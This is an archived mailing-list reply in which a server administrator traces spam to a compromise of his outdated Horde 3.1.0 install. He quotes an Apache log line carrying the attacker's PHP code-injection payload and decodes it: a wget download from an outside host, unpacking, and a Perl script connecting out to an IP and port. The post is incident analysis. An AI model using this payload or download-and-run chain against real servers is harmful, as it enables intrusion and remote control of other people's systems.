On 7/3/06, Natalio Gatti <[EMAIL PROTECTED]> wrote:
> Are you running something in Apache? If you have a script running there
> (PHP webpage, CGI script, etc.) it may have been compromised and someone
> is sending emails that way.
> BTW - PHPNuke is the worst. I had a client set that up, and within 24
> hours someone emailed them their own root password and let them know
> they had "owned" their system..... *NOT* nice.
>
And that´s what I´m looking right now. I have some (informal) pages
hosted, and I´m analyzing what the users have upload.
Thanks Jake, I hope to be getting to the bottom of this.
Found it!
It was my out-dated horde!!! Some italian spammer compromise the
server via horde 3.1.0 and installed tools to send spams.
Here are my apache logs:
----------------------------------------------------------------------------
205.138.198.226 - - [03/Jul/2006:03:44:59 -0400] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp%20;%20wget%20free-ftp.org%22.chr(47).%22chowz%22.chr(47).%22dcpl.tar.gz%20;%20tar%20xvf%20dcpl.tar.gz%20;%20rm%20-rf%20dcpl.tar.gz%20;%20perl%20dc.pl%20128.138.126.6%204886%22);'.
HTTP/1.1" 200 8152
------------------------------------------------
It executes:
wget free-ftp.org/chowz/dcpl.tar.gz
tar zxvf dcpl.tar.gz
rm dcpl.tar.gz
perl dc.pl 128.138.126.6
And the continues to download and execute tools. Dam!
---------------------------------------------------------------------
QmailToaster hosted by: VR Hosted <http://www.vr.org>
---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
